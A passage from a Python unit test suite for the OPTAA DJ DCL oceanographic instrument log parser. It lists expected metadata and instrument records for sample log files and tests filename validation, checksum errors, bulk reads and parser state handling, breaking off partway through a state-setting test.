from mi.idk.config import Config
RESOURCE_PATH = os.path.join(Config().base_dir(), 'mi', 'dataset', 'driver',
'optaa_dj', 'dcl', 'resource')
MODULE_NAME = 'mi.dataset.parser.optaa_dj_dcl'
# Expected tuples for data in file 20010314_010314.optaa1.log
EXPECTED_20010314_010314_optaa1 = [
((3193520594.000), ('2001-03-14 01:03:14', 4, 83, 1193047)),
((3193520594.000), (1, 2, 3, 4, 5, 6, 7, 111, 1,
[0],
[32767],
[32767],
[65535])),
((3193520594.111), (2, 4, 6, 8, 10, 12, 14, 222, 3,
[0, 16383, 32766],
[32767, 49150, 65533],
[32767, 16384, 1],
[65535, 49152, 32769])),
((3193520594.222), (3, 6, 9, 12, 15, 18, 21, 333, 14,
[0, 2520, 5040, 7560, 10080, 12600, 15120, 17640, 20160, 22680, 25200,
27720, 30240, 32760],
[32767, 35287, 37807, 40327, 42847, 45367, 47887, 50407, 52927, 55447,
57967, 60487, 63007, 65527],
[32767, 30247, 27727, 25207, 22687, 20167, 17647, 15127, 12607, 10087,
7567, 5047, 2527, 7],
[65535, 63015, 60495, 57975, 55455, 52935, 50415, 47895, 45375, 42855,
40335, 37815, 35295, 32775]))
]
# Expected tuples for data in file 20020704_020704.optaa2.log
EXPECTED_20020704_020704_optaa2 = [
((3234737224.000), ('2002-07-04 02:07:04', 5, 83, 1193048)),
((3234737224.000), (1, 2, 3, 4, 5, 6, 7, 222, 0,
[],
[],
[],
[])),
((3234737224.222), (2, 4, 6, 8, 10, 12, 14, 444, 2,
[0, 32767],
[32767, 65534],
[32767, 0],
[65535, 32768])),
((3234737224.444), (3, 6, 9, 12, 15, 18, 21, 666, 7,
[0, 5461, 10922, 16383, 21844, 27305, 32766],
[32767, 38228, 43689, 49150, 54611, 60072, 65533],
[32767, 27306, 21845, 16384, 10923, 5462, 1],
[65535, 60074, 54613, 49152, 43691, 38230, 32769])),
((3234737224.666), (4, 8, 12, 16, 20, 24, 28, 888, 4,
[0, 10922, 21844, 32766],
[32767, 43689, 54611, 65533],
[32767, 21845, 10923, 1],
[65535, 54613, 43691, 32769])),
((3234737224.888), (5, 10, 15, 20, 25, 30, 35, 1110, 27,
[0, 1260, 2520, 3780, 5040, 6300, 7560, 8820, 10080, 11340, 12600, 13860,
15120, 16380, 17640, 18900, 20160, 21420, 22680, 23940, 25200, 26460, 27720,
28980, 30240, 31500, 32760],
[32767, 34027, 35287, 36547, 37807, 39067, 40327, 41587, 42847, 44107,
45367, 46627, 47887, 49147, 50407, 51667, 52927, 54187, 55447, 56707, 57967,
59227, 60487, 61747, 63007, 64267, 65527],
[32767, 31507, 30247, 28987, 27727, 26467, 25207, 23947, 22687, 21427,
20167, 18907, 17647, 16387, 15127, 13867, 12607, 11347, 10087, 8827, 7567,
6307, 5047, 3787, 2527, 1267, 7],
[65535, 64275, 63015, 61755, 60495, 59235, 57975, 56715, 55455, 54195,
52935, 51675, 50415, 49155, 47895, 46635, 45375, 44115, 42855, 41595, 40335,
39075, 37815, 36555, 35295, 34035, 32775]))
]
# Expected tuples for data in file 20031031_031031.optaa3.log
EXPECTED_20031031_031031_optaa3 = [
((3276558631.000), ('2003-10-31 03:10:31', 6, 83, 1193049)),
((3276558631.000), (1, 2, 3, 4, 5, 6, 7, 333, 50,
[0, 668, 1336, 2004, 2672, 3340, 4008, 4676, 5344, 6012, 6680, 7348,
8016, 8684, 9352, 10020, 10688, 11356, 12024, 12692, 13360, 14028, 14696,
15364, 16032, 16700, 17368, 18036, 18704, 19372, 20040, 20708, 21376, 22044,
22712, 23380, 24048, 24716, 25384, 26052, 26720, 27388, 28056, 28724, 29392,
30060, 30728, 31396, 32064, 32732],
[32767, 33435, 34103, 34771, 35439, 36107, 36775, 37443, 38111, 38779,
39447, 40115, 40783, 41451, 42119, 42787, 43455, 44123, 44791, 45459, 46127,
46795, 47463, 48131, 48799, 49467, 50135, 50803, 51471, 52139, 52807, 53475,
54143, 54811, 55479, 56147, 56815, 57483, 58151, 58819, 59487, 60155, 60823,
61491, 62159, 62827, 63495, 64163, 64831, 65499],
[32767, 32099, 31431, 30763, 30095, 29427, 28759, 28091, 27423, 26755,
26087, 25419, 24751, 24083, 23415, 22747, 22079, 21411, 20743, 20075, 19407,
18739, 18071, 17403, 16735, 16067, 15399, 14731, 14063, 13395, 12727, 12059,
11391, 10723, 10055, 9387, 8719, 8051, 7383, 6715, 6047, 5379, 4711, 4043,
3375, 2707, 2039, 1371, 703, 35],
[65535, 64867, 64199, 63531, 62863, 62195, 61527, 60859, 60191, 59523,
58855, 58187, 57519, 56851, 56183, 55515, 54847, 54179, 53511, 52843, 52175,
51507, 50839, 50171, 49503, 48835, 48167, 47499, 46831, 46163, 45495, 44827,
44159, 43491, 42823, 42155, 41487, 40819, 40151, 39483, 38815, 38147, 37479,
36811, 36143, 35475, 34807, 34139, 33471, 32803])),
((3276558631.333), (2, 4, 6, 8, 10, 12, 14, 666, 255,
[0, 129, 258, 387, 516, 645, 774, 903, 1032, 1161, 1290, 1419, 1548,
1677, 1806, 1935, 2064, 2193, 2322, 2451, 2580, 2709, 2838, 2967, 3096, 3225,
3354, 3483, 3612, 3741, 3870, 3999, 4128, 4257, 4386, 4515, 4644, 4773, 4902,
5031, 5160, 5289, 5418, 5547, 5676, 5805, 5934, 6063, 6192, 6321, 6450, 6579,
6708, 6837, 6966, 7095, 7224, 7353, 7482, 7611, 7740, 7869, 7998, 8127, 8256,
8385, 8514, 8643, 8772, 8901, 9030, 9159, 9288, 9417, 9546, 9675, 9804, 9933,
10062, 10191, 10320, 10449, 10578, 10707, 10836, 10965, 11094, 11223, 11352,
11481, 11610, 11739, 11868, 11997, 12126, 12255, 12384, 12513, 12642, 12771,
12900, 13029, 13158, 13287, 13416, 13545, 13674, 13803, 13932, 14061, 14190,
14319, 14448, 14577, 14706, 14835, 14964, 15093, 15222, 15351, 15480, 15609,
15738, 15867, 15996, 16125, 16254, 16383, 16512, 16641, 16770, 16899, 17028,
17157, 17286, 17415, 17544, 17673, 17802, 17931, 18060, 18189, 18318, 18447,
18576, 18705, 18834, 18963, 19092, 19221, 19350, 19479, 19608, 19737, 19866,
19995, 20124, 20253, 20382, 20511, 20640, 20769, 20898, 21027, 21156, 21285,
21414, 21543, 21672, 21801, 21930, 22059, 22188, 22317, 22446, 22575, 22704,
22833, 22962, 23091, 23220, 23349, 23478, 23607, 23736, 23865, 23994, 24123,
24252, 24381, 24510, 24639, 24768, 24897, 25026, 25155, 25284, 25413, 25542,
25671, 25800, 25929, 26058, 26187, 26316, 26445, 26574, 26703, 26832, 26961,
27090, 27219, 27348, 27477, 27606, 27735, 27864, 27993, 28122, 28251, 28380,
28509, 28638, 28767, 28896, 29025, 29154, 29283, 29412, 29541, 29670, 29799,
29928, 30057, 30186, 30315, 30444, 30573, 30702, 30831, 30960, 31089, 31218,
31347, 31476, 31605, 31734, 31863, 31992, 32121, 32250, 32379, 32508, 32637,
32766],
[32767, 32896, 33025, 33154, 33283, 33412, 33541, 33670, 33799, 33928,
34057, 34186, 34315, 34444, 34573, 34702, 34831, 34960, 35089, 35218, 35347,
35476, 35605, 35734, 35863, 35992, 36121, 36250, 36379, 36508, 36637, 36766,
36895, 37024, 37153, 37282, 37411, 37540, 37669, 37798, 37927, 38056, 38185,
38314, 38443, 38572, 38701, 38830, 38959, 39088, 39217, 39346, 39475, 39604,
39733, 39862, 39991, 40120, 40249, 40378, 40507, 40636, 40765, 40894, 41023,
41152, 41281, 41410, 41539, 41668, 41797, 41926, 42055, 42184, 42313, 42442,
42571, 42700, 42829, 42958, 43087, 43216, 43345, 43474, 43603, 43732, 43861,
43990, 44119, 44248, 44377, 44506, 44635, 44764, 44893, 45022, 45151, 45280,
45409, 45538, 45667, 45796, 45925, 46054, 46183, 46312, 46441, 46570, 46699,
46828, 46957, 47086, 47215, 47344, 47473, 47602, 47731, 47860, 47989, 48118,
48247, 48376, 48505, 48634, 48763, 48892, 49021, 49150, 49279, 49408, 49537,
49666, 49795, 49924, 50053, 50182, 50311, 50440, 50569, 50698, 50827, 50956,
51085, 51214, 51343, 51472, 51601, 51730, 51859, 51988, 52117, 52246, 52375,
52504, 52633, 52762, 52891, 53020, 53149, 53278, 53407, 53536, 53665, 53794,
53923, 54052, 54181, 54310, 54439, 54568, 54697, 54826, 54955, 55084, 55213,
55342, 55471, 55600, 55729, 55858, 55987, 56116, 56245, 56374, 56503, 56632,
56761, 56890, 57019, 57148, 57277, 57406, 57535, 57664, 57793, 57922, 58051,
58180, 58309, 58438, 58567, 58696, 58825, 58954, 59083, 59212, 59341, 59470,
59599, 59728, 59857, 59986, 60115, 60244, 60373, 60502, 60631, 60760, 60889,
61018, 61147, 61276, 61405, 61534, 61663, 61792, 61921, 62050, 62179, 62308,
62437, 62566, 62695, 62824, 62953, 63082, 63211, 63340, 63469, 63598, 63727,
63856, 63985, 64114, 64243, 64372, 64501, 64630, 64759, 64888, 65017, 65146,
65275, 65404, 65533],
[32767, 32638, 32509, 32380, 32251, 32122, 31993, 31864, 31735, 31606,
31477, 31348, 31219, 31090, 30961, 30832, 30703, 30574, 30445, 30316, 30187,
30058, 29929, 29800, 29671, 29542, 29413, 29284, 29155, 29026, 28897, 28768,
28639, 28510, 28381, 28252, 28123, 27994, 27865, 27736, 27607, 27478, 27349,
27220, 27091, 26962, 26833, 26704, 26575, 26446, 26317, 26188, 26059, 25930,
25801, 25672, 25543, 25414, 25285, 25156, 25027, 24898, 24769, 24640, 24511,
24382, 24253, 24124, 23995, 23866, 23737, 23608, 23479, 23350, 23221, 23092,
22963, 22834, 22705, 22576, 22447, 22318, 22189, 22060, 21931, 21802, 21673,
21544, 21415, 21286, 21157, 21028, 20899, 20770, 20641, 20512, 20383, 20254,
20125, 19996, 19867, 19738, 19609, 19480, 19351, 19222, 19093, 18964, 18835,
18706, 18577, 18448, 18319, 18190, 18061, 17932, 17803, 17674, 17545, 17416,
17287, 17158, 17029, 16900, 16771, 16642, 16513, 16384, 16255, 16126, 15997,
15868, 15739, 15610, 15481, 15352, 15223, 15094, 14965, 14836, 14707, 14578,
14449, 14320, 14191, 14062, 13933, 13804, 13675, 13546, 13417, 13288, 13159,
13030, 12901, 12772, 12643, 12514, 12385, 12256, 12127, 11998, 11869, 11740,
11611, 11482, 11353, 11224, 11095, 10966, 10837, 10708, 10579, 10450, 10321,
10192, 10063, 9934, 9805, 9676, 9547, 9418, 9289, 9160, 9031, 8902, 8773,
8644, 8515, 8386, 8257, 8128, 7999, 7870, 7741, 7612, 7483, 7354, 7225, 7096,
6967, 6838, 6709, 6580, 6451, 6322, 6193, 6064, 5935, 5806, 5677, 5548, 5419,
5290, 5161, 5032, 4903, 4774, 4645, 4516, 4387, 4258, 4129, 4000, 3871, 3742,
3613, 3484, 3355, 3226, 3097, 2968, 2839, 2710, 2581, 2452, 2323, 2194, 2065,
1936, 1807, 1678, 1549, 1420, 1291, 1162, 1033, 904, 775, 646, 517, 388, 259,
130, 1],
[65535, 65406, 65277, 65148, 65019, 64890, 64761, 64632, 64503, 64374,
64245, 64116, 63987, 63858, 63729, 63600, 63471, 63342, 63213, 63084, 62955,
62826, 62697, 62568, 62439, 62310, 62181, 62052, 61923, 61794, 61665, 61536,
61407, 61278, 61149, 61020, 60891, 60762, 60633, 60504, 60375, 60246, 60117,
59988, 59859, 59730, 59601, 59472, 59343, 59214, 59085, 58956, 58827, 58698,
58569, 58440, 58311, 58182, 58053, 57924, 57795, 57666, 57537, 57408, 57279,
57150, 57021, 56892, 56763, 56634, 56505, 56376, 56247, 56118, 55989, 55860,
55731, 55602, 55473, 55344, 55215, 55086, 54957, 54828, 54699, 54570, 54441,
54312, 54183, 54054, 53925, 53796, 53667, 53538, 53409, 53280, 53151, 53022,
52893, 52764, 52635, 52506, 52377, 52248, 52119, 51990, 51861, 51732, 51603,
51474, 51345, 51216, 51087, 50958, 50829, 50700, 50571, 50442, 50313, 50184,
50055, 49926, 49797, 49668, 49539, 49410, 49281, 49152, 49023, 48894, 48765,
48636, 48507, 48378, 48249, 48120, 47991, 47862, 47733, 47604, 47475, 47346,
47217, 47088, 46959, 46830, 46701, 46572, 46443, 46314, 46185, 46056, 45927,
45798, 45669, 45540, 45411, 45282, 45153, 45024, 44895, 44766, 44637, 44508,
44379, 44250, 44121, 43992, 43863, 43734, 43605, 43476, 43347, 43218, 43089,
42960, 42831, 42702, 42573, 42444, 42315, 42186, 42057, 41928, 41799, 41670,
41541, 41412, 41283, 41154, 41025, 40896, 40767, 40638, 40509, 40380, 40251,
40122, 39993, 39864, 39735, 39606, 39477, 39348, 39219, 39090, 38961, 38832,
38703, 38574, 38445, 38316, 38187, 38058, 37929, 37800, 37671, 37542, 37413,
37284, 37155, 37026, 36897, 36768, 36639, 36510, 36381, 36252, 36123, 35994,
35865, 35736, 35607, 35478, 35349, 35220, 35091, 34962, 34833, 34704, 34575,
34446, 34317, 34188, 34059, 33930, 33801, 33672, 33543, 33414, 33285, 33156,
33027, 32898, 32769])),
((3276558631.666), (3, 6, 9, 12, 15, 18, 21, 999, 125,
[0, 264, 528, 792, 1056, 1320, 1584, 1848, 2112, 2376, 2640, 2904, 3168,
3432, 3696, 3960, 4224, 4488, 4752, 5016, 5280, 5544, 5808, 6072, 6336, 6600,
6864, 7128, 7392, 7656, 7920, 8184, 8448, 8712, 8976, 9240, 9504, 9768,
10032, 10296, 10560, 10824, 11088, 11352, 11616, 11880, 12144, 12408, 12672,
12936, 13200, 13464, 13728, 13992, 14256, 14520, 14784, 15048, 15312, 15576,
15840, 16104, 16368, 16632, 16896, 17160, 17424, 17688, 17952, 18216, 18480,
18744, 19008, 19272, 19536, 19800, 20064, 20328, 20592, 20856, 21120, 21384,
21648, 21912, 22176, 22440, 22704, 22968, 23232, 23496, 23760, 24024, 24288,
24552, 24816, 25080, 25344, 25608, 25872, 26136, 26400, 26664, 26928, 27192,
27456, 27720, 27984, 28248, 28512, 28776, 29040, 29304, 29568, 29832, 30096,
30360, 30624, 30888, 31152, 31416, 31680, 31944, 32208, 32472, 32736],
[32767, 33031, 33295, 33559, 33823, 34087, 34351, 34615, 34879, 35143,
35407, 35671, 35935, 36199, 36463, 36727, 36991, 37255, 37519, 37783, 38047,
38311, 38575, 38839, 39103, 39367, 39631, 39895, 40159, 40423, 40687, 40951,
41215, 41479, 41743, 42007, 42271, 42535, 42799, 43063, 43327, 43591, 43855,
44119, 44383, 44647, 44911, 45175, 45439, 45703, 45967, 46231, 46495, 46759,
47023, 47287, 47551, 47815, 48079, 48343, 48607, 48871, 49135, 49399, 49663,
49927, 50191, 50455, 50719, 50983, 51247, 51511, 51775, 52039, 52303, 52567,
52831, 53095, 53359, 53623, 53887, 54151, 54415, 54679, 54943, 55207, 55471,
55735, 55999, 56263, 56527, 56791, 57055, 57319, 57583, 57847, 58111, 58375,
58639, 58903, 59167, 59431, 59695, 59959, 60223, 60487, 60751, 61015, 61279,
61543, 61807, 62071, 62335, 62599, 62863, 63127, 63391, 63655, 63919, 64183,
64447, 64711, 64975, 65239, 65503],
[32767, 32503, 32239, 31975, 31711, 31447, 31183, 30919, 30655, 30391,
30127, 29863, 29599, 29335, 29071, 28807, 28543, 28279, 28015, 27751, 27487,
27223, 26959, 26695, 26431, 26167, 25903, 25639, 25375, 25111, 24847, 24583,
24319, 24055, 23791, 23527, 23263, 22999, 22735, 22471, 22207, 21943, 21679,
21415, 21151, 20887, 20623, 20359, 20095, 19831, 19567, 19303, 19039, 18775,
18511, 18247, 17983, 17719, 17455, 17191, 16927, 16663, 16399, 16135, 15871,
15607, 15343, 15079, 14815, 14551, 14287, 14023, 13759, 13495, 13231, 12967,
12703, 12439, 12175, 11911, 11647, 11383, 11119, 10855, 10591, 10327, 10063,
9799, 9535, 9271, 9007, 8743, 8479, 8215, 7951, 7687, 7423, 7159, 6895, 6631,
6367, 6103, 5839, 5575, 5311, 5047, 4783, 4519, 4255, 3991, 3727, 3463, 3199,
2935, 2671, 2407, 2143, 1879, 1615, 1351, 1087, 823, 559, 295, 31],
[65535, 65271, 65007, 64743, 64479, 64215, 63951, 63687, 63423, 63159,
62895, 62631, 62367, 62103, 61839, 61575, 61311, 61047, 60783, 60519, 60255,
59991, 59727, 59463, 59199, 58935, 58671, 58407, 58143, 57879, 57615, 57351,
57087, 56823, 56559, 56295, 56031, 55767, 55503, 55239, 54975, 54711, 54447,
54183, 53919, 53655, 53391, 53127, 52863, 52599, 52335, 52071, 51807, 51543,
51279, 51015, 50751, 50487, 50223, 49959, 49695, 49431, 49167, 48903, 48639,
48375, 48111, 47847, 47583, 47319, 47055, 46791, 46527, 46263, 45999, 45735,
45471, 45207, 44943, 44679, 44415, 44151, 43887, 43623, 43359, 43095, 42831,
42567, 42303, 42039, 41775, 41511, 41247, 40983, 40719, 40455, 40191, 39927,
39663, 39399, 39135, 38871, 38607, 38343, 38079, 37815, 37551, 37287, 37023,
36759, 36495, 36231, 35967, 35703, 35439, 35175, 34911, 34647, 34383, 34119,
33855, 33591, 33327, 33063, 32799]))
]
# Expected tuples for data in file 20061225_061225.optaa6.log
EXPECTED_20061225_061225_optaa6 = [
((3376015945.000), ('2006-12-25 06:12:25', 9, 83, 1193052)),
((3376015945.000), (1, 2, 3, 4, 5, 6, 7, 666, 1,
[0],
[32767],
[32767],
[65535])),
((3376015945.666), (2, 4, 6, 8, 10, 12, 14, 1332, 2,
[0, 32767],
[32767, 65534],
[32767, 0],
[65535, 32768])),
((3376015946.332), (3, 6, 9, 12, 15, 18, 21, 1998, 3,
[0, 16383, 32766],
[32767, 49150, 65533],
[32767, 16384, 1],
[65535, 49152, 32769])),
((3376015946.998), (4, 8, 12, 16, 20, 24, 28, 2664, 4,
[0, 10922, 21844, 32766],
[32767, 43689, 54611, 65533],
[32767, 21845, 10923, 1],
[65535, 54613, 43691, 32769])),
((3376015947.664), (5, 10, 15, 20, 25, 30, 35, 3330, 5,
[0, 8191, 16382, 24573, 32764],
[32767, 40958, 49149, 57340, 65531],
[32767, 24576, 16385, 8194, 3],
[65535, 57344, 49153, 40962, 32771])),
((3376015948.330), (6, 12, 18, 24, 30, 36, 42, 3996, 6,
[0, 6553, 13106, 19659, 26212, 32765],
[32767, 39320, 45873, 52426, 58979, 65532],
[32767, 26214, 19661, 13108, 6555, 2],
[65535, 58982, 52429, 45876, 39323, 32770])),
((3376015948.996), (7, 14, 21, 28, 35, 42, 49, 4662, 7,
[0, 5461, 10922, 16383, 21844, 27305, 32766],
[32767, 38228, 43689, 49150, 54611, 60072, 65533],
[32767, 27306, 21845, 16384, 10923, 5462, 1],
[65535, 60074, 54613, 49152, 43691, 38230, 32769])),
((3376015949.662), (8, 16, 24, 32, 40, 48, 56, 5328, 8,
[0, 4681, 9362, 14043, 18724, 23405, 28086, 32767],
[32767, 37448, 42129, 46810, 51491, 56172, 60853, 65534],
[32767, 28086, 23405, 18724, 14043, 9362, 4681, 0],
[65535, 60854, 56173, 51492, 46811, 42130, 37449, 32768])),
((3376015950.328), (9, 18, 27, 36, 45, 54, 63, 5994, 9,
[0, 4095, 8190, 12285, 16380, 20475, 24570, 28665, 32760],
[32767, 36862, 40957, 45052, 49147, 53242, 57337, 61432, 65527],
[32767, 28672, 24577, 20482, 16387, 12292, 8197, 4102, 7],
[65535, 61440, 57345, 53250, 49155, 45060, 40965, 36870, 32775])),
((3376015950.994), (10, 20, 30, 40, 50, 60, 70, 6660, 10,
[0, 3640, 7280, 10920, 14560, 18200, 21840, 25480, 29120, 32760],
[32767, 36407, 40047, 43687, 47327, 50967, 54607, 58247, 61887, 65527],
[32767, 29127, 25487, 21847, 18207, 14567, 10927, 7287, 3647, 7],
[65535, 61895, 58255, 54615, 50975, 47335, 43695, 40055, 36415, 32775]))
]
FILE1 = '20010314_010314.optaa1.log'
FILE2 = '20020704_020704.optaa2.log'
FILE3 = '20031031_031031.optaa3.log'
FILE4 = '20041220_041220.optaa4.log'
FILE5 = '20050401_050401.optaa5.log'
FILE6 = '20061225_061225.optaa6.log'
FILE_BAD_FILENAME = '20190401.optaa19.log'
EXPECTED_FILE1 = EXPECTED_20010314_010314_optaa1
EXPECTED_FILE2 = EXPECTED_20020704_020704_optaa2
EXPECTED_FILE3 = EXPECTED_20031031_031031_optaa3
EXPECTED_FILE6 = EXPECTED_20061225_061225_optaa6
RECORDS_FILE4 = 5 # 1 metadata, 4 instrument records
RECORDS_FILE6 = 11 # 1 metadata, 10 instrument records
EXCEPTIONS_FILE5 = 3 # number of exceptions expected
@attr('UNIT', group='mi')
class OptaaDjDclParserUnitTestCase(ParserUnitTestCase):
"""
optaa_dj_dcl Parser unit test suite
"""
def create_rec_parser(self, file_handle, filename, new_state=None):
"""
This function creates a OptaaDjDcl parser for recovered data.
"""
return OptaaDjDclRecoveredParser(self.rec_config,
file_handle, new_state, self.rec_state_callback,
self.rec_pub_callback, self.rec_exception_callback, filename)
def create_tel_parser(self, file_handle, filename, new_state=None):
"""
This function creates a OptaaDjDcl parser for telemetered data.
"""
return OptaaDjDclTelemeteredParser(self.tel_config,
file_handle, new_state, self.rec_state_callback,
self.tel_pub_callback, self.tel_exception_callback, filename)
def open_file(self, filename):
return open(os.path.join(RESOURCE_PATH, filename), mode='r')
def rec_state_callback(self, state, file_ingested):
""" Call back method to watch what comes in via the position callback """
self.rec_state_callback_value = state
self.rec_file_ingested_value = file_ingested
def tel_state_callback(self, state, file_ingested):
""" Call back method to watch what comes in via the position callback """
self.tel_state_callback_value = state
self.tel_file_ingested_value = file_ingested
def rec_pub_callback(self, pub):
""" Call back method to watch what comes in via the publish callback """
self.rec_publish_callback_value = pub
def tel_pub_callback(self, pub):
""" Call back method to watch what comes in via the publish callback """
self.tel_publish_callback_value = pub
def rec_exception_callback(self, exception):
""" Call back method to watch what comes in via the exception callback """
self.rec_exception_callback_value = exception
self.rec_exceptions_detected += 1
def tel_exception_callback(self, exception):
""" Call back method to watch what comes in via the exception callback """
self.tel_exception_callback_value = exception
self.tel_exceptions_detected += 1
def setUp(self):
ParserUnitTestCase.setUp(self)
self.rec_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: MODULE_NAME,
DataSetDriverConfigKeys.PARTICLE_CLASS: None
}
self.tel_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: MODULE_NAME,
DataSetDriverConfigKeys.PARTICLE_CLASS: None
}
self.rec_state_callback_value = None
self.rec_file_ingested_value = False
self.rec_publish_callback_value = None
self.rec_exception_callback_value = None
self.rec_exceptions_detected = 0
self.tel_state_callback_value = None
self.tel_file_ingested_value = False
self.tel_publish_callback_value = None
self.tel_exception_callback_value = None
self.tel_exceptions_detected = 0
self.maxDiff = None
def test_bad_filename(self):
"""
This test verifies that a DatasetParserException occurs if the filename
is bad.
"""
log.debug('===== START TEST BAD FILENAME =====')
in_file = self.open_file(FILE_BAD_FILENAME)
with self.assertRaises(DatasetParserException):
parser = self.create_rec_parser(in_file, FILE_BAD_FILENAME)
with self.assertRaises(DatasetParserException):
parser = self.create_tel_parser(in_file, FILE_BAD_FILENAME)
log.debug('===== END TEST BAD FILENAME =====')
def test_big_giant_input(self):
"""
Read a large file and verify that all expected particles can be read.
Verification is not done at this time, but will be done during
integration and qualification testing.
"""
log.debug('===== START TEST BIG GIANT INPUT RECOVERED =====')
in_file = self.open_file(FILE6)
parser = self.create_rec_parser(in_file, FILE6)
# In a single read, get all particles in this file.
number_expected_results = RECORDS_FILE6
result = parser.get_records(number_expected_results)
self.assertEqual(len(result), number_expected_results)
in_file.close()
self.assertEqual(self.rec_exception_callback_value, None)
log.debug('===== START TEST BIG GIANT INPUT TELEMETERED =====')
in_file = self.open_file(FILE4)
parser = self.create_tel_parser(in_file, FILE4)
# In a single read, get all particles in this file.
number_expected_results = RECORDS_FILE4
result = parser.get_records(number_expected_results)
self.assertEqual(len(result), number_expected_results)
in_file.close()
self.assertEqual(self.tel_exception_callback_value, None)
log.debug('===== END TEST BIG GIANT INPUT =====')
def test_checksum_errors(self):
"""
This test verifies that records containing checksum errors
are detected and that particles are not generated.
"""
log.debug('===== START TEST CHECKSUM ERRORS =====')
in_file = self.open_file(FILE5)
parser = self.create_rec_parser(in_file, FILE5)
# Try to get a record and verify that none are produced.
# Verify that the correct number of checksum errors are detected.
result = parser.get_records(1)
self.assertEqual(result, [])
self.assertEqual(self.rec_exceptions_detected, EXCEPTIONS_FILE5)
in_file.close()
in_file = self.open_file(FILE5)
parser = self.create_tel_parser(in_file, FILE5)
# Try to get a record and verify that none are produced.
# Verify that the correct number of checksum errors are detected.
result = parser.get_records(1)
self.assertEqual(result, [])
self.assertEqual(self.rec_exceptions_detected, EXCEPTIONS_FILE5)
in_file.close()
log.debug('===== END TEST CHECKSUM ERRORS =====')
def test_get_many(self):
"""
Read a file and pull out multiple data particles at one time.
Verify that the results are those we expected.
"""
log.debug('===== START TEST GET MANY RECOVERED =====')
in_file = self.open_file(FILE2)
parser = self.create_rec_parser(in_file, FILE2)
# Generate a list of expected result particles.
expected_particle = []
for count, expected in enumerate(EXPECTED_FILE2):
ntp_time, fields = expected
# Generate expected particle
if count == 0:
particle = OptaaDjDclRecoveredMetadataDataParticle(fields,
internal_timestamp=ntp_time)
else:
particle = OptaaDjDclRecoveredInstrumentDataParticle(fields,
internal_timestamp=ntp_time)
expected_particle.append(particle)
# In a single read, get all particles for this file.
result = parser.get_records(len(expected_particle))
self.assertEqual(result, expected_particle)
self.assertEqual(self.rec_exception_callback_value, None)
in_file.close()
log.debug('===== START TEST GET MANY TELEMETERED =====')
in_file = self.open_file(FILE3)
parser = self.create_tel_parser(in_file, FILE3)
# Generate a list of expected result particles.
expected_particle = []
for count, expected in enumerate(EXPECTED_FILE3):
ntp_time, fields = expected
# Generate expected particle
if count == 0:
particle = OptaaDjDclTelemeteredMetadataDataParticle(fields,
internal_timestamp=ntp_time)
else:
particle = OptaaDjDclTelemeteredInstrumentDataParticle(fields,
internal_timestamp=ntp_time)
expected_particle.append(particle)
# In a single read, get all particles for this file.
result = parser.get_records(len(expected_particle))
self.assertEqual(result, expected_particle)
self.assertEqual(self.tel_exception_callback_value, None)
in_file.close()
log.debug('===== END TEST GET MANY =====')
def test_invalid_state(self):
"""
This test verifies an exception is raised when an invalid state
is used to initialize the parser.
"""
log.debug('===== START TEST INVALID STATE =====')
in_file = self.open_file(FILE1)
# TIME_SINCE_POWER_UP is missing
initial_state = {
OptaaStateKey.POSITION: 12,
OptaaStateKey.METADATA_GENERATED: True
}
with self.assertRaises(DatasetParserException):
parser = self.create_rec_parser(in_file, FILE1, new_state=initial_state)
# POSITION is missing
initial_state = {
OptaaStateKey.TIME_SINCE_POWER_UP: 1.345,
OptaaStateKey.METADATA_GENERATED: True
}
with self.assertRaises(DatasetParserException):
parser = self.create_tel_parser(in_file, FILE1, new_state=initial_state)
# METADATA_GENERATED is missing
initial_state = {
OptaaStateKey.TIME_SINCE_POWER_UP: 1.345,
OptaaStateKey.POSITION: 12,
}
with self.assertRaises(DatasetParserException):
parser = self.create_rec_parser(in_file, FILE1, new_state=initial_state)
# Instead of a dictionary, pass a list of dictionaries.
initial_state = [
{OptaaStateKey.POSITION: 12},
{OptaaStateKey.METADATA_GENERATED: True},
{OptaaStateKey.TIME_SINCE_POWER_UP: 1.345}
]
with self.assertRaises(DatasetParserException):
parser = self.create_tel_parser(in_file, FILE1, new_state=initial_state)
log.debug('===== END TEST INVALID STATE =====')
def test_mid_state_start(self):
"""
Test starting a parser with a state in the middle of processing.
"""
log.debug('===== START TEST MID-STATE START RECOVERED =====')
in_file = self.open_file(FILE2)
# Start at the beginning of record 4 (of 5 total)
initial_state = {
OptaaStateKey.POSITION: 177,
OptaaStateKey.METADATA_GENERATED: True,
OptaaStateKey.TIME_SINCE_POWER_UP: 0.222
}
parser = self.create_rec_parser(in_file, FILE2, new_state=initial_state)
# Generate a list of expected result particles.
expected_particle = []
for count, expected in enumerate(EXPECTED_FILE2):
if count >= 4:
ntp_time, fields = expected
particle = OptaaDjDclRecoveredInstrumentDataParticle(fields,
internal_timestamp=ntp_time)
expected_particle.append(particle)
# Get record and verify.
result = parser.get_records(len(expected_particle))
self.assertEqual(result, expected_particle)
in_file.close()
log.debug('===== START TEST MID-STATE START TELEMETERED =====')
in_file = self.open_file(FILE1)
# Start at the beginning of record 3 (of 3 total)
initial_state = {
OptaaStateKey.POSITION: 102,
OptaaStateKey.METADATA_GENERATED: True,
OptaaStateKey.TIME_SINCE_POWER_UP: 0.111
}
parser = self.create_rec_parser(in_file, FILE1, new_state=initial_state)
# Generate a list of expected result particles.
expected_particle = []
for count, expected in enumerate(EXPECTED_FILE1):
if count >= 3:
ntp_time, fields = expected
particle = OptaaDjDclTelemeteredInstrumentDataParticle(fields,
internal_timestamp=ntp_time)
expected_particle.append(particle)
# Get record and verify.
result = parser.get_records(len(expected_particle))
self.assertEqual(result, expected_particle)
in_file.close()
log.debug('===== END TEST MID-STATE START =====')
def test_set_state(self):
"""
This test verifies that the state can be changed after starting.
Some particles are read and then the parser state is modified to
skip ahead or back.
"""
log.debug('===== START TEST SET STATE RECOVERED =====')
in_file = self.open_file(FILE6)
parser = self.create_rec_parser(in_file, FILE6)
# Read and verify 4 particles (of the 11).
# 1 metadata particle, 3 instrument particles.
for count, expected in enumerate(EXPECTED_FILE6[ : 4]):
ntp_time, fields = expected
# Generate expected particle
if count == 0:
expected_particle = \
OptaaDjDclRecoveredMetadataDataParticle(fields,
internal_timestamp=ntp_time)
else:
expected_particle = \
OptaaDjDclRecoveredInstrumentDataParticle(fields,
internal_timestamp=ntp_time)
# Get record and verify.
result = parser.get_records(1)
self.assertEqual(result, [expected_particle])
# Skip ahead in the file so that we get the last 3 particles.
new_state = {
OptaaStateKey.POSITION: 469,
